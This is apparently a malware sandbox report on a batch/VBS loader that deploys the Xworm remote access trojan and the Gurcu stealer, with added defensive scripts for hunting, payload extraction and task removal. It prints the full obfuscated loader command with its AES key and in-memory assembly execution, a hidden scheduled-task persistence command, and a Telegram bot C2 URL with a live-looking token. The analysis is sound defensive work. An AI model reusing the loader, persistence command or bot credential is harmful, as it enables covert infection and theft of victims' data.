Analysis

  • max time kernel
    297s
  • max time network
    299s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25-09-2024 13:31

General

  • Target

    telegram malware.bat.vbs

  • Size

    47KB

  • MD5

    2d4b3f85f3619e096e14096a0849fbf9

  • SHA1

    c9aa9a3f00830625ff3f806d0b0d6a22ac3a7d93

  • SHA256

    49a7db4ab12330edff1ef80c5e0c9c93d69c4fe36e4ae25eb92d311be55baf66

  • SHA512

    42f220a2dee917c3c14164a4fe2399e196218fcea7bc5d56afee6c08ac0bf88b765a9e5bda1cff5f17d59d85800575ceba26819116ca33829a27abed2b53c4aa

  • SSDEEP

    768:0yWnyN9IbUZIYiztjyHg6QihA1WmmaMj17Hln1nVrV:0E9XqYwtWAb1DmdxLln5

Malware Config

Extracted

Family

xworm

Version

5.0

aes.plain

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7533145045:AAGnW8Bkr0_G1f_ZxiKTve5hlRZjphTc0aM/sendMessage?chat_id=-4512836800
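
The Gurcu/WhiteSnake C2 above is a Telegram Bot API endpoint: everything between `/bot` and `/sendMessage` is the bot token (`<numeric bot id>:<secret>`), and `chat_id` is the chat the stolen data is posted to (negative IDs are group chats). Because the traffic terminates at api.telegram.org over TLS, the URL is only visible where TLS is broken (proxy, EDR script/URL telemetry) and the useful indicator is the bot id plus chat id rather than the host name. The script below is an added example, not part of the sandbox report, that pulls such beacons out of proxy log lines; the log lines are constructed for the example (the first URL is the C2 from this config, the second bot is made up), and the log format is an assumption.

```powershell
# Added example (not from the report): find Telegram Bot API beacons in proxy/web logs and extract
# the bot id, API method and chat_id that identify the operator's channel.
# Constructed sample log: "<timestamp> <client ip> <method> <url> <status>". Line 2 uses the C2 from
# this report's config; the bot on line 3 is invented for the example.
$SampleProxyLog = @(
    '2024-09-25T13:32:01Z 10.0.0.17 CONNECT api.telegram.org:443 200',
    '2024-09-25T13:32:02Z 10.0.0.17 GET https://api.telegram.org/bot7533145045:AAGnW8Bkr0_G1f_ZxiKTve5hlRZjphTc0aM/sendMessage?chat_id=-4512836800&text=test 200',
    '2024-09-25T13:34:40Z 10.0.0.23 POST https://api.telegram.org/bot100200300:AAExampleExampleExampleExampleExamp/sendDocument?chat_id=-100123456789 200',
    '2024-09-25T13:35:00Z 10.0.0.42 GET https://example.com/ 200'
)

function Find-TelegramBotBeacon {
    param([Parameter(ValueFromPipeline)][string]$Line)
    begin {
        # Token = <numeric bot id>:<secret>; the API method says what the stealer is doing
        # (sendMessage = text exfil/heartbeat, sendDocument = file upload).
        $urlRx    = [regex]'api\.telegram\.org/bot(?<bot>\d+):(?<secret>[A-Za-z0-9_-]+)/(?<method>[A-Za-z]+)'
        $chatRx   = [regex]'[?&]chat_id=(?<chat>-?\d+)'
        $clientRx = [regex]'^\S+\s+(?<client>\d{1,3}(?:\.\d{1,3}){3})'
    }
    process {
        $m = $urlRx.Match($Line)
        if (-not $m.Success) { return }
        $c = $chatRx.Match($Line)
        $chat = if ($c.Success) { $c.Groups['chat'].Value } else { $null }
        [pscustomobject]@{
            Client = $clientRx.Match($Line).Groups['client'].Value
            BotId  = $m.Groups['bot'].Value
            Method = $m.Groups['method'].Value
            ChatId = $chat
            # The secret is a live credential for the operator's bot: mask it before it lands in a
            # ticket or dashboard. The bot id alone is enough to block and to report the bot.
            Token  = $m.Groups['bot'].Value + ':' + ('*' * $m.Groups['secret'].Value.Length)
        }
    }
}

$hits = $SampleProxyLog | Find-TelegramBotBeacon
$hits | Format-Table -AutoSize

# One row per bot: which internal hosts talk to it, to which chats, with which API methods.
$hits | Group-Object BotId | ForEach-Object {
    [pscustomobject]@{
        BotId   = $_.Name
        ChatIds = ($_.Group.ChatId  | Sort-Object -Unique) -join ','
        Clients = ($_.Group.Client  | Sort-Object -Unique) -join ','
        Methods = ($_.Group.Method  | Sort-Object -Unique) -join ','
    }
}
```

On the constructed input this yields two beacons (bot 7533145045 to chat -4512836800 via sendMessage from 10.0.0.17, and the made-up bot via sendDocument from 10.0.0.23); the CONNECT and example.com lines are ignored. In this report the requests are attributed to the powershell.exe hosts (PIDs 4432 and 2948, flagged "Blocklisted process makes network request"), so on an endpoint the same hunt is a powershell.exe process resolving or connecting to api.telegram.org, which a browser would normally be doing instead.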

Signatures

  • Detect Xworm Payload 1 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\telegram malware.bat.vbs"
    PID:1680
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:4952
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    PID:2980
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\telegram malware.bat" "
    • Suspicious use of WriteProcessMemory
    PID:3740
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('xkyHsUEz3I6ELu2lR0z7m6Kw05wb28L/CX73bVCU13U='); $aes_var.IV=[System.Convert]::FromBase64String('/jm5YEgLEZRhB2OjwCSNTQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$nShDB=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$qhgjI=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$CCizP=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($nShDB, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $CCizP.CopyTo($qhgjI); $CCizP.Dispose(); $nShDB.Dispose(); $qhgjI.Dispose(); $qhgjI.ToArray();}function execute_function($param_var,$param2_var){ IEX '$FvEfJ=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$fCCPt=$FvEfJ.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$fCCPt.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$bqfmX = 'C:\Users\Admin\AppData\Local\Temp\telegram malware.bat';$host.UI.RawUI.WindowTitle = $bqfmX;$ZowMM=[System.IO.File]::ReadAllText($bqfmX).Split([Environment]::NewLine);foreach ($WJela in $ZowMM) { if ($WJela.StartsWith('THuwPURqSTjmbbqbMgKM')) { $jeKym=$WJela.Substring(20); break; }}$payloads_var=[string[]]$jeKym.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
        PID:4208
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4432
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2024
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\telegram malware')
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3864
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4576
  • C:\Windows\System32\NOTEPAD.EXE
    "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\SC.cmd
    • Opens file in notepad (likely ransom note)
    PID:344
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SC.cmd" "
    • Suspicious use of WriteProcessMemory
    PID:2284
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('xkyHsUEz3I6ELu2lR0z7m6Kw05wb28L/CX73bVCU13U='); $aes_var.IV=[System.Convert]::FromBase64String('/jm5YEgLEZRhB2OjwCSNTQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$nShDB=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$qhgjI=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$CCizP=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($nShDB, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $CCizP.CopyTo($qhgjI); $CCizP.Dispose(); $nShDB.Dispose(); $qhgjI.Dispose(); $qhgjI.ToArray();}function execute_function($param_var,$param2_var){ IEX '$FvEfJ=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$fCCPt=$FvEfJ.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$fCCPt.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$bqfmX = 'C:\Users\Admin\AppData\Roaming\SC.cmd';$host.UI.RawUI.WindowTitle = $bqfmX;$ZowMM=[System.IO.File]::ReadAllText($bqfmX).Split([Environment]::NewLine);foreach ($WJela in $ZowMM) { if ($WJela.StartsWith('THuwPURqSTjmbbqbMgKM')) { $jeKym=$WJela.Substring(20); break; }}$payloads_var=[string[]]$jeKym.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
        PID:2760
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2948
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            • Command and Scripting Interpreter: PowerShell
            PID:1900
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\SC')
            PID:4988
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            • Command and Scripting Interpreter: PowerShell
            PID:3524
  • C:\Windows\System32\SppExtComObj.Exe
    "C:\Windows\System32\SppExtComObj.Exe"
    PID:1884
  • C:\Windows\System32\SppExtComObj.Exe
    "C:\Windows\System32\SppExtComObj.Exe"
    PID:560
  • C:\Windows\System32\SppExtComObj.Exe
    "C:\Windows\System32\SppExtComObj.Exe"
    PID:1816
  • C:\Windows\System32\Spectrum.exe
    "C:\Windows\System32\Spectrum.exe"
    PID:4932

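The `cmd.exe /S /D /c" echo cls;powershell ...` children in the tree are the loader stage: the .bat is handed to PowerShell, which reads its own file, takes the first line starting with the 20-character marker `THuwPURqSTjmbbqbMgKM`, splits the rest on `\` into three slots, undoes a `#`→`/` and `@`→`A` masking of the base64, AES-256-CBC/PKCS7-decrypts each slot with the hard-coded key and IV, GZip-decompresses it and calls `[Reflection.Assembly]::Load()` followed by `EntryPoint.Invoke()`, so the Xworm and Gurcu assemblies never touch disk (the first two entry points are invoked with no arguments, the third with an empty `string[]`, i.e. a `Main(string[] args)`). The type names are spelled with `*` and reassembled at run time to defeat string-matching AMSI rules, but the crypto parameters are in clear text. The script below is an added example, not code from the sample or the sandbox: it runs the same pipeline statically and writes the three assemblies to disk instead of loading them. Marker, key and IV are the values the loader carries; the output names and the `MZ` sanity check are this script's own choices. Run it in an analysis VM, since the written files are the live payloads.

```powershell
<#
Added example (not from the report): static extractor for the batch/VBS loader above.
Usage, in an analysis VM:
  .\Extract-LoaderPayloads.ps1 -Path '.\telegram malware.bat' -OutDir .\extracted
SC.cmd from %APPDATA% is the same file (same hashes), so it works on that copy too.
#>
[CmdletBinding()]
param(
    [Parameter(Mandatory)][string]$Path,
    [string]$OutDir = '.\extracted',
    # Marker, key and IV exactly as hard-coded in the loader's PowerShell.
    [string]$Marker = 'THuwPURqSTjmbbqbMgKM',
    [string]$KeyB64 = 'xkyHsUEz3I6ELu2lR0z7m6Kw05wb28L/CX73bVCU13U=',
    [string]$IvB64  = '/jm5YEgLEZRhB2OjwCSNTQ=='
)

function Unprotect-LoaderBlob {
    # AES-256-CBC with PKCS7 padding, as the loader's decrypt_function.
    param([byte[]]$CipherText, [byte[]]$Key, [byte[]]$Iv)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key     = $Key
        $aes.IV      = $Iv
        $dec = $aes.CreateDecryptor()
        try { return ,$dec.TransformFinalBlock($CipherText, 0, $CipherText.Length) }
        finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
}

function Expand-GZipBlob {
    # GZip decompression, as decompress_function without the '*'-spelled type names.
    param([byte[]]$Compressed)
    $in  = New-Object System.IO.MemoryStream(,$Compressed)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out); return ,$out.ToArray() }
    finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
}

$key = [Convert]::FromBase64String($KeyB64)   # 32 bytes -> AES-256
$iv  = [Convert]::FromBase64String($IvB64)    # 16 bytes

# The loader reads the whole file and takes the first line that starts with the marker.
$line = Get-Content -LiteralPath $Path | Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
if (-not $line) { throw "No line starting with marker '$Marker' in $Path" }

$null    = New-Item -ItemType Directory -Force -Path $OutDir
$outRoot = (Resolve-Path -LiteralPath $OutDir).ProviderPath   # .NET file APIs need an absolute path
$slots   = $line.Substring($Marker.Length).Split('\')

for ($i = 0; $i -lt $slots.Length; $i++) {
    $b64    = $slots[$i].Replace('#', '/').Replace('@', 'A')   # undo the loader's base64 masking
    $plain  = Expand-GZipBlob (Unprotect-LoaderBlob ([Convert]::FromBase64String($b64)) $key $iv)
    $isPe   = ($plain.Length -gt 2) -and ($plain[0] -eq 0x4D) -and ($plain[1] -eq 0x5A)   # 'MZ'
    $target = Join-Path $outRoot ('payload{0}.bin' -f ($i + 1))
    [System.IO.File]::WriteAllBytes($target, $plain)
    [pscustomobject]@{
        Slot   = $i + 1
        Bytes  = $plain.Length
        IsPE   = $isPe
        SHA256 = (Get-FileHash -LiteralPath $target -Algorithm SHA256).Hash
        File   = $target
    }
}
```

Each slot should come out as a PE (`IsPE` true); a slot that decrypts but fails the check, or throws a padding error, means the sample uses a different key or masking than this one and the script's parameters need adjusting from the sample's own `decrypt_function`. The resulting assemblies are .NET (both families are C# per the signatures above) and can be opened directly in a .NET decompiler; slot 3 is the one that receives a `string[]` at its entry point.

The persistence step is the `Register-ScheduledTask` call visible twice in the tree: the loader first checks with `(Get-ScheduledTask).Actions.Execute -join ''` whether any task already points at its own path, copies itself to `C:\Users\Admin\AppData\Roaming\SC.cmd` (same MD5/SHA256 as the submitted sample, see Downloads), and registers a hidden task named `OneNote startup_str` that runs that file at every logon with `-RunLevel Highest`, no execution time limit and `-AllowStartIfOnBatteries`. The second run of the chain in the tree is SC.cmd being executed from the new location. The script below is an added hunting and removal example, not from the report: it flags tasks whose action lives under a user-writable profile path or that combine the loader's other tells (logon trigger, hidden, highest run level, script extension), then removes the known-bad task. The scoring threshold and the evidence directory are assumptions.

```powershell
# Added example (not from the report): hunt for scheduled-task persistence of the kind the loader
# registers ('OneNote startup_str' -> %APPDATA%\SC.cmd, logon trigger, hidden, RunLevel Highest)
# and remove the known-bad task. Run elevated so Get-ScheduledTask returns every principal's tasks.
$EvidenceDir = 'C:\IR\evidence'   # assumed; where the .cmd is preserved before deletion

function Get-SuspiciousLogonTask {
    [CmdletBinding()]
    param(
        # Roots a standard user can write to; a task that launches from here is worth a look by itself.
        [string[]]$UserWritableRoots = @($env:APPDATA, $env:LOCALAPPDATA, $env:TEMP, $env:PUBLIC)
    )
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($action in @($task.Actions)) {
            $exe = [string]$action.Execute
            if (-not $exe) { continue }   # COM-handler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($exe).Trim('"')
            $inUserPath = [bool]($UserWritableRoots | Where-Object { $_ -and $exe.StartsWith($_, [StringComparison]::OrdinalIgnoreCase) })
            $logon      = [bool](@($task.Triggers) | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' })
            $highest    = "$($task.Principal.RunLevel)" -eq 'Highest'
            $hidden     = [bool]$task.Settings.Hidden
            $scriptExt  = [IO.Path]::GetExtension($exe) -in @('.cmd', '.bat', '.vbs', '.js', '.ps1')
            # Score: count of the loader's tells; a user-writable path is reported regardless.
            $score      = @($inUserPath, $logon, $highest, $hidden, $scriptExt).Where({ $_ }).Count
            if ($inUserPath -or $score -ge 3) {
                [pscustomobject]@{
                    TaskName  = $task.TaskName
                    TaskPath  = $task.TaskPath
                    Execute   = $exe
                    Arguments = [string]$action.Arguments
                    RunLevel  = "$($task.Principal.RunLevel)"
                    Hidden    = $hidden
                    LogonTrig = $logon
                    Score     = $score
                }
            }
        }
    }
}

$hits = Get-SuspiciousLogonTask
$hits | Format-Table TaskName, Execute, RunLevel, Hidden, LogonTrig, Score -AutoSize

# Remediation for the task in this report: unregister first so nothing relaunches the script,
# then preserve the .cmd (it carries the encrypted payloads) before deleting it.
$known = $hits | Where-Object { $_.TaskName -eq 'OneNote startup_str' -or $_.Execute -like '*\AppData\Roaming\SC.cmd' }
foreach ($hit in $known) {
    Unregister-ScheduledTask -TaskName $hit.TaskName -TaskPath $hit.TaskPath -Confirm:$false
    if (Test-Path -LiteralPath $hit.Execute) {
        $null = New-Item -ItemType Directory -Force -Path $EvidenceDir
        Copy-Item -LiteralPath $hit.Execute -Destination (Join-Path $EvidenceDir ([IO.Path]::GetFileName($hit.Execute)))
        Remove-Item -LiteralPath $hit.Execute -Force
    }
}
```

Removing the task and the file does not end the already-running payloads: the in-memory Xworm and Gurcu assemblies live inside the `powershell.exe -w hidden` hosts (PIDs 2024 and 1900 in the tree), so those processes need to be terminated or the host isolated as well, and the Telegram bot id from the config is the indicator to block at the proxy.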
Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize 3KB
    MD5 3f01549ee3e4c18244797530b588dad9
    SHA1 3e87863fc06995fe4b741357c68931221d6cc0b9
    SHA256 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
    SHA512 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize 53KB
    MD5 a26df49623eff12a70a93f649776dab7
    SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
    SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
    SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
    Filesize 2KB
    MD5 e4de99c1795fd54aa87da05fa39c199c
    SHA1 dfaaac2de1490fae01104f0a6853a9d8fe39a9d7
    SHA256 23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457
    SHA512 796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize 1KB
    MD5 cc2ce575753731574bf10ff6e5162032
    SHA1 b660e5156f97af770e5d359fdd2a6ea697f359fb
    SHA256 c0c37fd6fb26d101e347a1e9b5190029bb591d8c57392dbf2df4741b11fc2dfa
    SHA512 715bb49c3977d51ff39b0458b99c5e3ba786e3110a4015402cd023b484ff385704475238fb813d074524d76bc733b0d4e92b57b64d187b3d6a664e4f38eebc1b
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize 1KB
    MD5 97748f71ed95026706014e8524266292
    SHA1 f60663ea2e2a778c57d07d9678fe04c79c3ff942
    SHA256 f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f
    SHA512 b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize 1KB
    MD5 11b2ddac5f77354fdf267769650c46f4
    SHA1 4b4fb743eefb36191871d8bd3dc374caed41a9db
    SHA256 b61a60bf71fdae451a7be222d041d153262224d241c0803e0f7bb289013ac134
    SHA512 72372c52617151d65d97363770b128c8a0180e4713ec98f992c2f802c4781fcd6ab4dc6153b256254870aae63e30d453fb61489c1f2f9f912d5efd1bb97bc2ae
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0waypmk4.lup.ps1
    Filesize 60B
    MD5 d17fe0a3f47be24a6453e9ef58c94641
    SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Admin\AppData\Roaming\SC.cmd
    Filesize 47KB
    MD5 2d4b3f85f3619e096e14096a0849fbf9
    SHA1 c9aa9a3f00830625ff3f806d0b0d6a22ac3a7d93
    SHA256 49a7db4ab12330edff1ef80c5e0c9c93d69c4fe36e4ae25eb92d311be55baf66
    SHA512 42f220a2dee917c3c14164a4fe2399e196218fcea7bc5d56afee6c08ac0bf88b765a9e5bda1cff5f17d59d85800575ceba26819116ca33829a27abed2b53c4aa
  • memory/4432-23-0x0000021D32F70000-0x0000021D32FB4000-memory.dmp
    Filesize 272KB
  • memory/4432-37-0x0000021D32F40000-0x0000021D32F48000-memory.dmp
    Filesize 32KB
  • memory/4432-13-0x0000021D32DF0000-0x0000021D32E12000-memory.dmp
    Filesize 136KB
  • memory/4432-62-0x0000021D334F0000-0x0000021D334FE000-memory.dmp
    Filesize 56KB
  • memory/4432-38-0x0000021D32F50000-0x0000021D32F5E000-memory.dmp
    Filesize 56KB
  • memory/4432-24-0x0000021D333A0000-0x0000021D33416000-memory.dmp
    Filesize 472KB
  • memory/4432-36-0x0000021D32DD0000-0x0000021D32DD8000-memory.dmp
    Filesize 32KB
  • memory/4952-9-0x0000021E38320000-0x0000021E38321000-memory.dmp
    Filesize 4KB
  • memory/4952-1-0x0000021E38320000-0x0000021E38321000-memory.dmp
    Filesize 4KB
  • memory/4952-7-0x0000021E38320000-0x0000021E38321000-memory.dmp
    Filesize 4KB
  • memory/4952-10-0x0000021E38320000-0x0000021E38321000-memory.dmp
    Filesize 4KB
  • memory/4952-8-0x0000021E38320000-0x0000021E38321000-memory.dmp
    Filesize 4KB
  • memory/4952-11-0x0000021E38320000-0x0000021E38321000-memory.dmp
    Filesize 4KB
  • memory/4952-12-0x0000021E38320000-0x0000021E38321000-memory.dmp
    Filesize 4KB
  • memory/4952-6-0x0000021E38320000-0x0000021E38321000-memory.dmp
    Filesize 4KB
  • memory/4952-2-0x0000021E38320000-0x0000021E38321000-memory.dmp
    Filesize 4KB
  • memory/4952-0-0x0000021E38320000-0x0000021E38321000-memory.dmp
    Filesize 4KB